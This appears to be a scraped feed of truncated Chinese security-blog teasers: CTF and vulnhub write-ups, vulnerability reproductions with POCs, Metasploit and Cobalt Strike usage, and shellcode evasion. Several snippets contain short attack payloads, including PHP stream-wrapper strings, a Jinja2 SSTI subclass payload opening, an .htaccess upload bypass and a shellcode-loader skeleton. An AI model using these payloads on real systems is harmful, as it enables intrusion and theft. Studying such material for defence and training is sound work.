一. 单选题（共16题） 1.【单选题】职业是由于社会分工和生产内部的（）而形成的具有特定专业和专门职责的工作。 A、劳动分工 B、智力分工 C、生产分工 D、社会分工正确答案：A 2.【单选题】职业是在人类社会出现分工之后…

虹科分享 | 如何保护便携式存储设备的安全？| 数据安全

在数字化的时代，便携式存储设备成为了连接我们与数字世界的桥梁。无论是个人用户、企业还是工业环境下，都离不开这些小巧而强大的设备。一、连接您的数字世界 1、文件传输与共享便携式存储设备如USB闪存驱动器和移动硬盘提供了简便的文件传输和共享…

vulnhub-ripper（易）

打靶练习Ripper，这是一个中低的靶场 0x00 部署0x01 信息收集：端口扫描、服务发现0x02路径扫描0x03 总结 0x00 部署靶机：下载地址宿主机：kali2021版本 0x01 信息收集：端口扫描、服务发现 sudo arp-scan -l #探测存…

XSS(跨站脚本攻击)漏洞理解

一、XSS简介跨站脚本攻击XSS(Cross Site Scripting)。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页面时，嵌入Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。XSS通常被用于获取Cookie、以受攻击者的身份进行操作等行…

渗透测试漏洞原理之---【CSRF跨站请求伪造】

文章目录 1、CSRF概述1.1、基本原理1.1.1、基本概念1.1.2、关键点1.1.3、目标 1.2、CSRF场景1.2.1、银行支付转账1.2.2构造虚假网站1.2.3、场景建模 1.3、CSRF类别1.3.1、POST方式 1.4、CSRF验证1.4.1、CSRF PoC Generator 2、CSRF攻防2.1、CSRF实战2.1.1、与XSS 漏洞相结合 2.…

【网络安全 --- 工具安装】VMware 16.0 详细安装过程（提供资源）

一，VMware下载地址： 百度网盘链接链接：百度网盘请输入提取码百度网盘为您提供文件的网络备份、同步和分享服务。空间大、速度快、安全稳固，支持教育网加速，支持手机端。注册使用百度网盘即可享受免费存储空间https:/…

新型安卓恶意软件使用Protobuf协议窃取用户数据

近日有研究人员发现，MMRat新型安卓银行恶意软件利用protobuf 数据序列化这种罕见的通信方法入侵设备窃取数据。趋势科技最早是在2023年6月底首次发现了MMRat，它主要针对东南亚用户，在VirusTotal等反病毒扫描服务中一直未被发现。虽然研究…

164到网络安全面试大全（附答案）

最近有不少小伙伴跑来咨询： 想找网络安全工作，应该要怎么进行技术面试准备？工作不到 2 年，想跳槽看下机会，有没有相关的面试题呢？ 为了更好地帮助大家高薪就业，今天就给大家分享两份网络安全工…

黑客常用的10大工具介绍

黑客技术一度被认为是一个神秘的特有领域，随着技术的进步和领域环境的进步，它已经成为一种非常普遍的现象。黑客技术可以用于有害目的，也可以用于发现系统中的漏洞，并通知系统属主，帮助他们更好地保护系统。借助于一些…

web：[MRCTF2020]你传你呢

题目点进页面显示如下上传文件，先随便上传一个文件看看情况构造含有一句话木马的图片上传访问显示错误这里参考了大佬的wp，上传一个.htaccess文件,这个.htaccess文件的作用就是把这个图片文件解析成php代码执行 .htaccess文件的内容为 <FilesM…

小米路由器的未授权访问

01 漏洞产生小米路由器由于Nginx的配置文件，没有配置好，存在一个目录穿越的漏洞。在Nginx当中存在该漏洞，配置如下： location /xxx {alias /abc/; }02 fofa搜索 app“小米路由器” 03 漏洞利用如此配置，攻击者…

IE浏览器攻击：MS11-003_IE_CSS_IMPORT

目录概述利用过程漏洞复现概述 MS11-003_IE_CSS_IMPORT是指Microsoft Security Bulletin MS11-003中的一个安全漏洞，影响Internet Explorer（IE）浏览器。这个漏洞允许攻击者通过在CSS文件中使用import规则来加载外部CSS文件&#xff0…

【包过滤防火墙——firewalld动态防火墙】的简单使用

文章目录 firewald与iptables区别firewalld九个区域firewalld配置方法firewalld参数和命令firewalld两种模式firewalld使用实验 firewalld不要与iptables混用 firewald与iptables区别 iptables 主要是基于接口，来设置规则，从而判断网络的安全性。firewa…

如何简化大型网络服务提供商中的DDoS防护事宜

分布式拒绝服务（DDoS）攻击对服务提供商构成重大威胁，它们有可能破坏关键基础设施并扰乱业务运营。然而对于大型服务提供商而言实施和管理有效的DDoS防护解决方案可能非常复杂且成本高昂。下面，火伞云将和大家一起探讨如何简化大型…

一个集成的BurpSuite漏洞探测插件1.2

4、DNSLog查询漏报注：扫描结束后才会在BurpSuite的Target、Dashboard模块显示高危漏洞，进程扫描中无法进行同步，但可以在插件中查看（涉及到DoPassive方法问题）。

攻防世界-Caesar

原题解题思路没出现什么特殊字符，可能是个移位密码。凯撒密码加密解密。偏移12位就行。

简单了解ARP协议

目录一、什么是ARP协议？ 二、为什么需要ARP协议？ 三、ARP报文格式四、广播域是什么？ 五、ARP缓存表是什么？ 六、ARP的类型 6.1 ARP代理 6.2 免费ARP 七、不同网络设备收到ARP广播报文的处理规则八、ARP工作机制原理 …

OD动调之脱壳：使用ESP定律寻找

OD动调之脱壳：使用ESP定律寻找 using OD F8 sigle step Until stop Then data window follow! Block! then F9! Jmp -> oep 401171 You can unpack upx!

影响Windows 和 macOS平台，黑客利用 Adobe CF 漏洞部署恶意软件

FortiGuard 实验室的网络安全研究人员发现了几个影响 Windows 和 Mac 设备的 Adobe ColdFusion 漏洞。远程攻击者可利用Adobe ColdFusion 2021中的验证前RCE漏洞，获取受影响系統的控制权力。Adobe 已发布安全补丁来解决这些漏洞，但攻击者仍在利用这些漏…

ToBeWritten之基于ATTCK的模拟攻击：闭环的防御与安全运营

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

网络渗透day12-高级问题2

当然，继续提供更多高级网络渗透测试问题和回答： 在渗透测试中，您如何评估目标系统的人工智能（AI）模型的隐私保护机制，以查找可能的隐私泄露和数据滥用风险？ - 回答：我会分析AI模型的…

CVE-2023-3450：锐捷 RG-BCR860 命令执行漏洞复现

锐捷 RG-BCR860 命令执行漏洞(CVE-2023-3450)复现 0x01 前言本次测试仅供学习使用，如若非法他用，与本文作者无关，需自行负责！！！ 0x02 漏洞描述 Ruijie Networks RG-BCR860是中国锐捷网络（R…

Cmake入门（一文读懂）

目录 1、Cmake简介2、安装CMake3、CMakeLists.txt4、单目录简单实例4.1、CMakeLists.txt4.2、构建bulid内部构建外部构建 4.3、运行C语言程序 5、多目录文件简单实例5.1、根目录CMakeLists.txt5.2、源文件目录5.3、utils.h5.4、创建build 6、生成库文件和链接外部库文件7、注意…

Apache HTTPD 漏洞复现

文章目录 Apache HTTPD 漏洞复现1. Apache HTTPD 多后缀解析漏洞1.1 漏洞描述1.2 漏洞复现1.3 漏洞利用1.4 获取GetShell 2. Apache HTTPD 换行解析漏洞-CVE-2017-157152.1 漏洞描述2.2 漏洞复现2.3 漏洞利用 3. Apache HTTP Server_2.4.49 路径遍历和文件泄露漏洞-CVE-2021-41…

python脚本（渗透测试）

python爬取edusrc 通过此脚本，可以爬取edusrc的目标信息，生成目标字典，为下一步开发自动化测试工具做准备 import queue import threading import timeimport requests from bs4 import BeautifulSoup import re def get_edu_name():while …

Banana Pi BPI-W3(ArmSoM-W3) RK3588编解码之MPP环境配置

1. 简介瑞芯微提供的媒体处理软件平台（Media Process Platform，简称 MPP）是适用于瑞芯微芯片系列的通用媒体处理软件平台。该平台对应用软件屏蔽了芯片相关的复杂底层处理，其目的是为了屏蔽不同芯片的差异，为使用者…

虹科直播 | CDS网络与数据安全专题技术直播重磅来袭，11.2起与您精彩相约

文章来源：虹科网络安全阅读原文：https://mp.weixin.qq.com/s/T-CgU28hmYy4YV5SV9QGhg 虹科数据加密解决方案虹科终端安全防护方案虹科是在各细分专业技术领域内的资源整合及技术服务落地供应商，虹科网络安全事业部的宗旨是：让…

框架安全-CVE 漏洞复现DjangoFlaskNode.jsJQuery框架漏洞复现

目录服务攻防-框架安全&CVE复现&Django&Flask&Node.JS&JQuery漏洞复现中间件列表介绍常见语言开发框架Python开发框架安全-Django&Flask漏洞复现Django开发框架漏洞复现CVE-2019-14234（Django JSONField/HStoreField SQL注入漏洞&#xff…

重磅！2023两院外籍院士增选名单公布

根据《中国科学院院士章程》《中国科学院外籍院士选举办法》等规定，2023年中国科学院选举产生了30名中国科学院外籍院士。现予公布。中国科学院 2023年11月23日中国工程院2023年外籍院士增选共选举产生16位中国工程院外籍院士。现予公布。中国工程院 2023年…

【华为数通HCIP | 网络工程师】821-IGP高频题、易错题之OSPF（1）

个人名片： 🐼作者简介：一名大三在校生，喜欢AI编程🎋 🐻‍❄️个人主页🥇：落798. 🐼个人WeChat：hmmwx53 🕊️系列专栏：🖼️…

【网络奇缘】- 计算机网络|分层结构|ISO模型

🌈个人主页: Aileen_0v0🔥系列专栏: 一见倾心,再见倾城 --- 计算机网络~💫个人格言:"没有罗马,那就自己创造罗马~" 目录计算机网络分层结构 OSI参考模型 OSI模型起源失败原因: OSI模型组成协议的作用 📝全文…

BUUCTF [WUSTCTF2020]find_me 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 得到的 flag 请包上 flag{} 提交。感谢 Iven Huang 师傅供题。比赛平台：https://ctfgame.w-ais.cn/ 密文： 下载附件，得到一个.jpg图片。解题思路： 1、得到一张图…

【漏洞复现】好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞附POC

漏洞描述 “好视通”是国内云视频会议知名品牌，拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 [5] ，专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。用全国产、高清流畅、安全稳定的云视频服务助力各行各业数字化转型。其视频…

通过Metasploit+Ngrok穿透内网长期维持访问外网Android设备

前言: 因为之前作为小白我不会在Kali Linux里面把IP映射出外网，卡在那个地方很久，后来解决了这个问题就写方法出来和大家分享分享。环境： Kali Linux系统(https://www.kali.org/downloads/) Metasploit Ngrok Linux64位的端口转发工具(htt…

【网络奇遇记】那年我与计算机网络的初相识 —— 网络的体系结构

🌈个人主页：聆风吟 🔥系列专栏：网络奇遇记、数据结构 🔖少年有梦不应止于心动，更要付诸行动。文章目录一. 常见的三种计算机网络体系结构1.1 开放系统互连参考模型1.2 TCP/IP参考模型1.3 原理参考模型二…

【漏洞复现】IP-guard WebServer 远程命令执行

漏洞描述 IP-guard是一款终端安全管理软件，旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。互联网上披露IP-guard WebServer远程命令执行漏洞情报。攻击者可利用该漏洞执行任意命令，获取服务器控制权限。免责声明技术文章仅供参考，任何个人和…

2024年山东省职业院校技能大赛中职组“网络安全”赛项竞赛试题-C

2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-C 一、竞赛时间总计：360分钟二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值 A、B模块 A-1 登录安全加固 180分钟 200分 A-2 本地安全策略设置 A-3 流量完整性保护 A-4 …

BUUCTF webshell后门 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 朋友的网站被黑客上传了webshell后门，他把网站打包备份了，你能帮忙找到黑客的webshell在哪吗？(Webshell中的密码(md5)即为答案) 密文： 下载附件，解压得到一…

在防御CC攻击上，高防CDN起着什么作用？

在当今数字化世界中，网络安全攻击已经成为普遍而严峻的威胁。特别是分布式拒绝服务攻击（DDoS）和CC攻击，它们有潜力使网络服务陷入完全瘫痪状态。为了应对这些威胁，采用高级防御CDN（内容传递网络&#xff09…

易思无人值守智能物流系统Sys_ReportFile文件上传漏洞复现

文章目录易思无人值守智能物流系统Sys_ReportFile文件上传漏洞复现0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议易思无人值守智能物流系统Sys_ReportFile文件上传漏洞复现 0x01 前言免责声明：请…

伊朗网络间谍组织针对中东金融和政府部门

导语近日，以色列网络安全公司Check Point与Sygnia发现了一起针对中东金融、政府、军事和电信部门的网络间谍活动。这一活动由伊朗国家情报和安全部门（MOIS）支持的威胁行为者发起，被称为"Scarred Manticore"。该组织被认…

网络安全（黑客）小白自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟入…

SSL证书在网购中的重要性

近年来，互联网的快速发展使得线上服务范围不断延伸，这其中网络购物更是在全球范围内都呈现上升趋势。然而病毒攻击，网络钓鱼攻击和恶意软件攻击无处不在，网上购物的安全性受到极大威胁。为了保护网络购物的安全，构建可…

BUUCTF FLAG 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 注意：请将 hctf 替换为 flag 提交，格式 flag{} 密文： 下载附件，得到一张.png图片。解题思路： 1、因为附件是一张图片，先放到StegSolve中&…

时空智友企业流程化管控系统文件存在任意文件上传漏洞

时空智友企业流程化管控系统文件存在任意文件上传漏洞免责声明漏洞描述漏洞影响漏洞危害网络测绘Fofa: app"时空智友V10.1" 漏洞复现1. 构造poc2. 发送数据包，上传文件3. 访问webshellwebshell地址免责声明仅用于技术交流,目的是向相关安全人员展示漏…

小H靶场学习笔记：DC-1

DC-1 Created: November 8, 2023 11:41 PM Tags: Drupal, SUID提权 Owner: 只惠摸鱼打靶场过程 nmap扫描存活主机 192.168.199.128可能性更大 8011122端口开发 ，访问跳转出Drupal页面，确定为靶机使用插件进行指纹识别可知以下信息&#xff1a…

OpenSSL ca证书命令操作详解

OpenSSL 的 ca 命令用于操作证书颁发机构（CA，Certificate Authority）的操作，包括签发、撤销和管理证书。以下是 OpenSSL 版本 3.0 中 openssl ca 命令的详细使用手册。请注意，由于文本长度限制，以下内容可能…

IP-guard WebServer 远程命令执行漏洞

IP-guard WebServer 远程命令执行漏洞免责声明漏洞描述漏洞影响漏洞危害网络测绘Fofa: app"ip-guard" 漏洞复现1. 构造poc2. 访问文件3. 执行命令免责声明仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。任何人不…

文件包含漏洞原理刨析

文件包含漏洞开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接调用此文件，而无需再次编写，这种调用文件的过程一般被称为包含。为了使代码更加灵活，通常会将被包含的文件设置为变量&#xf…

渗透测试之——信息收集思路

请遵守网络安全法渗透测试时要和客户定好时间再使用扫描器。渗透测试切记不要渗透客户所给域名的同级域名，可以渗透所给域名的子域名。信息收集永远是渗透测试的第一步。 1. 测试目标 xiusafe.com 2. 域名与ip 渗透测试中IP比域名更适合做渗透； …

2023年护网总结报告

目录一、概况二、演习背景三、护网前期工作准备 3.1 成立工作小组 3.2 攻击面自查自检 3.3 制定演习方案 3.4 加强监测设施四、护网工作落实情况 4.1 严格落实值班制度 4.2 威胁情报收集 4.3 强化应急响应 4.4 严格管控 4.5 保障业务连续性五、演习评估…

免杀对抗-成品EXE免杀-反特征码-通用跳转

一、exe程序生成 1.使用如下shellcode加载器，生成c/c语言的exe程序加载器：1.c #include <Windows.h> #include <stdio.h>#pragma comment(linker,"/section:.data,RWE")unsigned char shellcode[] 生成的shellcode;int main() { …

ctfhub-文件上传-双写后缀

1.首先判断是asp 、jsp、php的网站发现是php的网站，用哥斯拉生成index.php木马，抓包，将filename"index.php"改为filename"index.pcerhp" 2.用哥斯拉连接地址为：http://challenge-97f99bc5355c1edb.sandb…

泛微E-Office前台文件读取漏洞

一、漏洞描述泛微E-Office是一款企业级的全流程办公自动化软件，它包括协同办公、文档管理、知识管理、工作流管理等多个模块，涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化，提高工作效率和管理质量&a…

黑客组织“Anonymous”进行网络攻击抗议日本排放核污水

概述近期全球都在关注日本核污水排放，起因是日本政府宣布，福岛第一核电站核污染水8月24日开始排入海洋，计划排放30年。那么这件事为什么会引起全球关注呢，大家通过美国对日本投放原子弹后果，导致广岛长崎任然处于核辐…

Vulnhub: Hogwarts: Bellatrix靶机

kali：192.168.111.111 靶机：192.168.111.228 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.228访问80端口查看源码，提示ikilledsiriusblack.php和文件包含的参数名file 漏洞利用 ikilledsiriusblack.p…

某次护网红队getshell的经历

信息收集某企业提供信息：企业官网的真实外网ip，内网ip 企业官网比较硬，从控股超过51%的子公司入手通过企查查找到一堆控股高的子公司，通过ICP/IP地址/域名信息备案管理系统查找子公司官网，收集二级域名。通过google…

文件包含漏洞及漏洞复现

文件包含漏洞 1. 文件包含概述程序开发人员通常会把可重复使用函数或语句写到单个文件中，形成“封装”。在使用某个功能的时候，直接调用此文件，无需再次编写，提高代码重用性，减少代码量。这种调用文件的过程通常称为…

IS-IS实验总结（下）

路漫漫其修远兮，吾将上下而求索今天发布一篇自己关于IS-IS的自我总结，和一些简单的实验，我写的肯定不是最全的，但是这是我进行的自我总结的文章，省去了许多高大上的冠冕堂皇的话语，节约您学习的时间。我…

不安全的反序列化(phpjava)及漏洞复现

不安全的反序列化 1. 序列化与反序列化 A8:2017-不安全的反序列化 A08:2021-Software and Data Integrity Failures 为什么要序列化？ 序列化，将对象的状态信息转换为可以存储或传输的形式的过程，这种形式大多为字节流、字符串、json 串。…

数据公网传输加密隧道技术

参考： https://wenku.baidu.com/view/c2bfb9b4d6bbfd0a79563c1ec5da50e2524dd1a1.html?wkts1699578126402

渗透工具使用及思路总结（持续更新）

扫描类 nmap 快速扫描开放端口 nmap --min-rate 10000 -p- 10.129.252.63扫描详细全服务 nmap -sV -A -p 22,80 10.129.252.63 nmap -sV -A -p- 10.129.252.63-l：显示正在监听的 TCP 和 UDP 端口； -a：显示所有活动的 TCP 连接； -A <网络类型>或 - <网络类型&g…

Python武器库开发-常用模块之copy模块(十五)

常用模块之copy模块(十五) 在Python编程中，我们经常遇到需要复制或拷贝数据的情况。为了避免不必要的问题和错误，Python提供了copy模块来处理复制操作。本文将介绍copy模块的用法，包括浅拷贝和深拷贝的概念以及如何在不同场景中使用。我们…

开源检测数据库是否明文存储工具——OpenDLP的使用教程

前言这些天Darren洋在做项目安全test调研的过程中，发现了一款非常不错的可自定义敏感数据类型的检测数据库是否明文存储工具。 OpenDLP 是一个开源项目，提供用于数据丢失预防（DLP）的工具。它允许自定义扫描规则，包括对…

网络安全（大厂面试真题集）

前言随着国家政策的扶持，网络安全行业也越来越为大众所熟知，想要进入到网络安全行业的人也越来越多。为了拿到心仪的 Offer 之外，除了学好网络安全知识以外，还要应对好企业的面试。作为一个安全老鸟，工作这么多年…

文件包含_具体场景、zip、php相关问题

具体场景—上传可控的文件具体场景—远程文件包含具体场景—伪协议

3分钟告诉你如何成为一名黑客?｜零基础到黑客入门指南，你只需要掌握这五点能力

文章目录什么是黑客？成为一名黑客需要具备哪些能力？ 第一点，了解黑客的思维方式第二点，学习一门编程语言第三点，学习网络安全基础知识第四点，实战操作第五点，懂法律，懂法律&#xf…

DNS 区域传输（AXFR）

漏洞描述 docker环境搭建使用 AXFR 协议的 DNS 区域传输是跨 DNS 服务器复制 DNS 记录的最简单机制。为了避免在多个 DNS 服务器上编辑信息，可以在一台服务器上编辑信息，并使用 AXFR 将信息复制到其他服务器。但是，如果您不保护您的服务器&…

【CVE-2021-1675】Spoolsv打印机服务任意DLL加载漏洞分析

漏洞详情简介打印机服务提供了添加打印机的接口，该接口缺乏安全性校验，导致攻击者可以伪造打印机信息，在添加新的打印机时实现加载恶意DLL。这造成的后果就是以system权限执行任意代码。影响版本 windows_10 20h2 windows_10 21h1 win…

[SWPUCTF 2021 新生赛]PseudoProtocols

题目很明确了就是伪协议 php://filter/convert.base64-encode/resourcehint.php 提交的伪协议的内容需要是 I want flag，就会echo flag 方法1：adata://text/plain,I want flag 方法2：adata://text/plain;base64,SSB3YW50IGZsYWc

Java开发者的网络安全指南（二）

目录一、加密和数据保护二、身份验证和授权三、Web应用程序安全四、安全编码实践五、网络防火墙和入侵检测系统六、日志和监视七、漏洞管理八、安全教育和培训九、结论介绍： 简要说明网络安全的重要性和为什么Java开发者需要关注它。一、加密…

Flask（Jinja2）服务端模板注入漏洞(SSTI)

Flask（Jinja2） 服务端模板注入漏洞(SSTI) 参考 https://www.freebuf.com/articles/web/260504.html 验证漏洞存在 ?name{{7*7}} 回显49说明漏洞存在 vulhub给出的payload: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__…

客户案例：CAC2.0监测异常账号行为，缓解暴力破解攻击

客户背景某IT互联网公司专注于高精度导航定位技术的研发、制造和产业化推广，是国内高精度导航定位产业的领先企业之一。该公司以上海为总部，旗下拥有20国内省级本地化服务机构，并且其业务覆盖海外市场，公司产品和解决方案在不同…

fastjson漏洞复现

文章目录启动环境漏洞复现下载bp插件漏洞扫描dnslog测试是否向外请求资源用工具构造rmi服务器反弹shell 启动环境到vulhub目录下 cd vulhub/fastjson/1.2.24-rce安装环境并启动： sudo docker-compose up -d && sudo docker-compose up -d启动成功&…

buuctf crypto 【Cipher】解题记录

1.打开题目就有密文 2.一点思路没有，看看大佬的wp（BUUCTF Cipher 1_cipher buuctf_玥轩_521的博客-CSDN博客），捏麻麻的原来玄机就在“公平的玩吧”这句话里，playfair也是一种加密方式，密钥猜测也是playfair…

操作系统权限提升(三十)之数据库提权-SQL Server sp_oacreate+sp_oamethod（dba权限）提权

SQL Server sp_oacreate+sp_oamethod（dba权限）提权 sp_oacreate+sp_oamethod介绍在xp_cmdshell被删除或不能利用是可以考虑利用sp_oacreate，利用前提需要sqlserver sysadmin账户服务器权限为system（sqlserver2019默认被降权为mssql）。sp_oacreate 是一个存储过程，可以…

亿某通电子文档安全管理系统任意文件上传漏洞 CNVD-2022-43886

目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.Nuclei自动化扫描POC 6.修复建议

【漏洞复现】用友U8-Cloud 存在任意文件上传漏洞

漏洞描述 U8 cloud 聚焦成长型、创新型企业的云 ERP，基于全新的企业互联网应用设计理念，为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案，全面支持多组织业务协同、智能财务，人力服务、构建产业链智造平台，融合用友云服务实现企业互联网资源连接、共享、协同。…

一个最简单的工业通讯数据分析例子

1.背景对工业设备的通讯协议进行分析可以帮助我们更好地理解其工作原理和相关技术，并且有助于以下几个方面： 1. 优化工业设备的通讯效率：了解通讯协议的细节可以帮助我们找到通讯效率低下的原因并进行优化，提高设备的通讯效率和…

时空智友企业流程化管控系统任意文件上传漏洞复现【附POC】

文章目录时空智友企业流程化管控系统任意文件上传漏洞复现0x01 前言0x02 漏洞描述0x03 影响平台0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现4.访问shell地址 0x06 修复建议时空智友企业流程化管控系统任意文件上传漏洞复现 0x01 前言免责声明：请…

SQL注入——预编译CASE注入

文章目录预编译 CASE 注入1. SQL注入漏洞防御2. WEBGOAT SQL注入2.1 WebGoat 8.02.2 Order by 注入2.2.1 构造 when 的条件2.2.2 代码审计预编译 CASE 注入预编译 CASE（Prepared CASE）是一种数据库查询语言（如SQL）中的控制语句…

python代码混淆与代码打包

0x00 背景自己写的项目，又想保护源码，自己做个混淆是最方便的了。 0x01 实践这里使用开源工具 GitHub - astrand/pyobfuscate: pyobfuscate，虽然git上才500多star，但是很好用。它的使用场景是混淆单个py文件。很多事物有开始就…

网络安全：个人信息保护，企业信息安全，国家网络安全的重要性

在当前的数字化时代，无论是个人，企业，还是国家，都会面临严重的网络安全威胁。网络安全不仅涉及我们的日常生活，也涉及到社会的稳定和国家的安全。这就需要我们高度重视网络安全，强化个人信息保护&#xff0…

前端到底有多卷？可以转行吗？

我前几天招人，前后端各招一个人。后端一天大概60多个投简历的。前端岗位发出去，我吃了个饭，1小时回来收到300多份简历…… 是一位HR回复的前端卷到什么程度的回答！ 下面我们来看两组官方纰漏的数据： 2023届全国高…

漏洞复现--华测监测预警系统2.2任意文件读取

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

前端难学还是后端难学？系统安全，web安全，网络安全是什么区别？

系统安全，web安全，网络安全是什么区别？三无纬度安全问题系统安全，可以说是电脑软件的安全问题，比如windows经常提示修复漏洞，是一个安全问题网页安全，网站安全，比如，…

Cobalt Strike 钓鱼工具使用

免杀安装需要js环境介绍 obalt Strike是一款基于java的渗透测试神器，常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用，分为客户端与服务端，服务端是一个，客户端可以有多个&#xff…

VulnHub jarbas

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏…

授权专利破百，通付盾潜心精研迎接数字时代新征程

2023年10月10日，通付盾发明专利《一种零信任和保护数据隐私的数据确权系统及其方法》获得授权，至此公司授权发明专利突破100件，是公司科创属性的集中展现，也是公司成为数字化高端软件与服务提供商道路上的新里程碑。自成立以来&a…

【漏洞复现】Casdoor-任意文件读取

目录【漏洞介绍】【资产测绘Query】【漏洞复现】【漏洞介绍】 Casdoor系统static存在任意文件读取漏洞【漏洞描述】 Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的，UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发&#xff0…

互联网系统安全（一）

目录一、互联网系统安全概述互联网系统的安全性为什么如此重要互联网系统中的典型威胁二、威胁分析 2.1、跨站脚本（XSS） 2.1.1、跨站脚本 （XSS）攻击 2.1.2、SQL注入攻击： 2.2、跨站请求伪造（C…

【技能树笔记】网络篇——练习题解析（八）

目录前言一、LAN技术 1.1 堆叠与集群 1.2 MSTP的特点二、WAN技术 2.1 PPP链路建立 2.2 PPPoE 2.3 组播 2.3.1 组播的IP 2.3.2 组播分发树 2.3.3 组播协议三、IPv6基础 3.1 IPv6地址 3.2 IPv6协议 3.3 IPv6过渡技术总结 🌈嗨！我是Filotimo__&#x1…

安全响应中心 — 垃圾邮件事件报告（10.13）

2023年10月第二周一. 样本概况 ✅ 案例1：DocuSign钓鱼本周收到一封看似来自 DocuSign（DocuSign 是一种在企业环境中广泛使用的电子协议管理平台）的网络钓鱼电子邮件反馈。如下图所示： 以上样本内容大体是说XX发送了一份文…

如何构建安全的App网络通信？

前言说到安全肯定逃不开数据的加解密，数据本地存储大多用对称加解密来实现，那网络传输数据的时候是不是也用对称加解密来实现？没错，常规网络通信时，大部分网络传输过程中基本也是用对称加解密来实现的，毕竟…

EDUSRC-记一个SHELL捡漏

目录编辑 Jenkins - println绕过到shell命令执行语法 Jenkins未授权访问(捡漏失败) Jenkins捡漏弱口令脚本执行(println失败) CHATGPT调教绕过 hack渗透视频教程，扫码免费领 Jenkins - println绕过到shell命令执行语法 org"China Education and…

CTF/AWD竞赛标准参考书+实战指南：《AWD特训营》

随着网络安全问题日益凸显，国家对网络安全人才的需求持续增长，其中，网络安全竞赛在国家以及企业的人才培养和选拔中扮演着至关重要的角色。在数字化时代，企业为了应对日益增长的攻击威胁，一般都在大量部署安全产品、…

buuctf_练[羊城杯2020]easyphp

[羊城杯2020]easyphp 文章目录 [羊城杯2020]easyphp掌握知识解题思路关键paylaod 掌握知识 .htaccess文件的利用，把自己指定当做 php文件处理；preg_match正则匹配的了解，stristr函数的绕过；file_put_contents文件写入操作的了…

【等保小课堂】等保测评后还要花很多钱做等保整改吗？

我国正在严格执行等保政策，过等保企业也越来越多。但大家对于等保政策还不是很了解，有小伙伴在问，等保测评后还要花很多钱做等保整改吗？ 等保测评后还要花很多钱做等保整改吗？ 【回答】：不一定。等保测评后…

安装JoySSL的SSL证书有什么优势？

近年来，网络安全事件层出不穷，屡禁不止。据统计仍有57%的网站未进行https加密，成为数据泄漏的“导火索”之一。而SSL证书不仅仅可以保护网站数据安全，而且可以降低网站被第三方窃取或篡改的风险。安装JoySSL证书的好处&#…

记src-Juniper

一、hunter搜索web.title”Juniper Web Device Manager”，查找到香港的一处资产。二、访问相关网页，界面就是Juniper登录界面。三、根据编号为CVE-2023-36845的利用方法，抓包，修改提交方式，成功读取到文件。原始包…

Rookit系列二【文件隐藏】【支持Win7 x32/x64 ~ Win10 x32/x64平台的NTFS文件系统】

文章目录前言探究代码演示前言文件隐藏的方法有很多，这里分享的是一种通过内核文件重定向的方式动态规避检测的方法。举例：假设有一个安全软件A，A要扫描文件B，B是我们想要隐藏的文件。那么我们在内核中将A打开文件B的操作重定…

buuctf_练[GYCTF2020]FlaskApp

[GYCTF2020]FlaskApp 文章目录 [GYCTF2020]FlaskApp常用绕过方法掌握知识解题思路解题一 -- 计算pin码解题二 -- 拼接绕过执行命令关键paylaod 常用绕过方法 ssti详解与例题以及绕过payload大全_ssti绕过空格_HoAd’s blog的博客-CSDN博客 CTF 对SSTI的一些总结 - FreeBuf网…

网络安全（黑客技术）—0基础学习手册

目录一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、网络安全学习路线四、学习资料的推荐想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类…

云起无垠典型案例入选《2023软件供应链安全洞察》报告

近日，历时6个月，由ISC编制的《2023软件供应链安全洞察》报告（以下简称《报告》）正式对外发布。《报告》围绕软件供应链安全现状、技术内核、治理指南、落地实践展开，以期为行业从业者提供有价值的信息和洞见&#xff0…

渗透测试-Fastjson反序列化漏洞getshell

目录前言测试环境准备 dnslog测试搭建rmi服务器&准备恶意类引用JdbcRowSetImpl攻击反弹shell$命令执行总结关键字：fastjson 1.2.24反序列化导致任意命令执行漏洞注：本次渗透测试全在虚拟机中进行仅用于学习交流，请勿在实…

移动路由器Cellular Router命令执行漏洞复现 [附POC]

